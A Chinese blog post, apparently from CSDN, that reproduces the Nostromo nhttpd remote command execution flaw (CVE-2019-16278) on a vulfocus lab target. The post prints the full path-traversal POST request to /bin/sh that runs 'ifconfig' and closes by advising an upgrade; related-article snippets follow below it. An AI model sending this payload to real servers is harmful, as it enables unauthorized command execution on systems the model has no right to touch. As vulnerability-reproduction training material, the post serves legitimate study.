Nostromo 远程命令执行(CVE-2019-16278)复现

最新推荐文章于 2024-04-06 17:46:36 发布
最新推荐文章于 2024-04-06 17:46:36 发布
阅读量825 收藏 1
点赞数 1
分类专栏: 漏洞 文章标签: nostromo web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/122144895
版权
本文详细介绍了开源web服务器Nostromo(nhttpd)的CVE-2019-16278漏洞,该漏洞允许远程命令执行。受影响的版本为nhttpd 1.9.6及以下。通过在线环境搭建,展示了利用burp抓包构造注入命令来复现漏洞的过程,其中HTTP请求头必须设置为HTTP/1.0。成功执行命令后,显示了命令执行结果。最后,文章提醒用户通过升级到安全版本来修复此漏洞。
摘要由CSDN通过智能技术生成

Nostromo 远程命令执行(CVE-2019-16278)复现

框架介绍:

Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。

影响版本:

nhttpd:version <= 1.9.6

环境搭建:

这里采用在线环境 地址

漏洞复现:

访问首页

burp抓包,构造注入命令

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: vulfocus.fofa.so:34940
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

echo
echo
ifconfig 2>&1

 这里要注意HTTP/1.0必须时1.0

发现命令执行成功

poc地址 

 漏洞修复:

根据官方,升级到安全版本

xzhome
关注
专栏目录
Vulfocus解题复现nostromo 远程命令执行CVE-2019-16278
温氏效应
11-23 5040
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令
Nostromo Web服务器的远程命令执行CVE-2019-16278复现
玄道的网安博客
01-30 924
简介 Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。 影响版本 nhttpd:version <= 1.9.6 环境搭建 这里使用nostromo1.9.6的版本进行搭建 下载地址: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz 进入目录进行环境编译 cd /nostromo-1.9.6 make make install 完...
漏洞复现----2、Nostromo Web服务器远程命令执行(CVE-2019-16278)
七天
12-02 2232
文章目录一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh来实现路径穿越,而
nostromo 远程命令执行CVE-2019-16278)漏洞复现
weixin_42675091的博客
09-23 1048
nostromo 远程命令执行CVE-2019-16278)漏洞复现
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
qq_42430287的博客
12-19 640
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
(环境搭建+复现CVE-2019-16278 Nostromo Web服务器的远程命令执行
daxi0ng的博客
03-13 1737
【CNVD编号】 CVE-2019-16278 【漏洞名称】 Nostromo Web服务器的远程命令执行 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...
CVE-2019-16278Nostromo Web服务器的远程命令执行
NOSEC2019的博客
10-22 2620
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/...
Vulfocus练习之Nostromo nhttpd远程命令执行(CVE-2019-16278)
weixin_45701865的博客
12-12 862
nostromo远程命令执行(CVE-2019-16278)
Nostromo 1.9.6 远程代码执行漏洞(CVE-2019-16278
孤桜懶契
03-28 1197
漏洞描述 用于利用 Nostromo nhttpd 中函数 http_verify 中的目录遍历漏洞利用 CVE-2019-16278 (Nostromo 1.9.6),该漏洞通过精心设计的 HTTP 请求导致未经身份验证的 RCE。仅将 Web 服务器的主机和端口作为必需参数。 漏洞影响 s ✅Nostromo 1.9.6 空间测绘 d ⭕hunter:web.similar_id="4fe4d6adce727c111450c2be583537b6"&&header.server==
CVE-2019-16278-Nostromo Web Server远程代码执行
17bdw的编程备份笔记
12-17 172
本文主题主要是分析CVE-2019-16278漏洞原因、漏洞如何利用以及为什么会受到攻击。这个CVENostromo Web服务器(又名nhttpd)有关,这个组件是在FreeBSD,OpenBSD等Unix系统上非常流行的开源Web服务器。 Nostromo无法验证URL,导致可以通过路径遍历系统中的任何文件。没有通过身份验证的攻击者可以强制服务器指向/bin/sh之类的shell文件并执行...
Nostromo远程命令执行(CVE-2019-16278)
m0_65150886的博客
02-26 452
在nhttpd <= 1.9.6版本中,Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。1.访问http://ip:port,出现如下页面,开始实验。3.将数据包发送给重发器,并修改get请求。2.通过burp进行抓包。
nostromo 远程命令执行CVE-2019-16278复现
顺其自然~专栏
10-30 176
Nostromo nhttpd是一款开源的Web服务器。Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。然后尝试读取flag,经过测试flag位于/tmp目录下,因无法形成命令交互,所以使用管道符 最终的payload为cd /tmp && ls。发现存在cve-2019-16278。升级至最新版本1.9.7。
c++ 结构体遍历_利用目录遍历漏洞实现RCE(CVE201916278漏洞分析,附GDB调试过程)
weixin_39826984的博客
11-26 269
0x00 前言前几天有大佬放出了CVE-2019-16278CVE-2019-16279的payload,16278可以利用跨目录遍历漏洞造成RCE(Remote Command Execute),16279可以实现DOS攻击。漏洞影响Nostromo webserver 1.9.6及以下所有版本,因为这是一个小众Web服务器,网络上的资料较少,笔者在搭建环境的过程中踩了不少坑,导致分...
Goby 漏洞更新 | Nostromo nhttpd远程代码执行漏洞(CVE-2019-16278
m0_46699477的博客
04-21 211
CVE-2019-16278 nostromo nhttpd 是一款开源的 Web 服务器。 nostromo nhttpd 1.9.6 及之前版本中的 `http_verify` 函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
freebsd查看服务_CVE-2019-16278Nostromo Web服务器的远程命令执行
weixin_39763033的博客
12-09 211
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh...
CVE-2019-14287复现
weixin_42298807的博客
10-28 1200
一、 漏洞成因 管理员在sudo配置文档中用了ALL关键字造成的。 sudo权限绕过漏洞,sudo,Linux系统管理命令,允许用户在不切换环境的前提下,以其他用户的权限运行应用程序或命令。 二、 影响版本 1.8.28之前的所有版本 三、 漏洞复现 1、 查看sudo版本 sudo -V 2、 新建账户 useradd test passwd test 3、 修改sudo配置文件 vim /e...
入侵防御漏洞复现(二)_cve-2019-16278 kali,字节跳动面试分享
最新发布
2401_84140816的博客
04-06 925
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。CloudBees Jenkins是美国CloudBees公司的一款基于Java开发的开源的、可持续集成的自动化服务器,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS(Long-Term Support)是CloudBees Jenkins的一个长期支持版本。
入侵防御漏洞复现(二)
szdx1043的博客
01-16 447
Nostromo由于在验证URL安全性方面存在,导致目录穿越,任何人都可以系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令
Nostromo nhttpd系列漏洞利用以及总结
jammny
10-23 1689
前言: Nostromonhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。 Nostromo 目录遍历(CVE-2011-0751) 漏洞详情: 1.9.4之前版本中存在目录遍历漏洞。远程攻击者可以借助URI中的“..%2f”执行任意程序或者读取任意文件。 影响版本: versions <= 1.9.4 POC: #!/bin/sh if [ $# -lt 3 ]; then echo "Usage: $(basename $0) HOST P..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值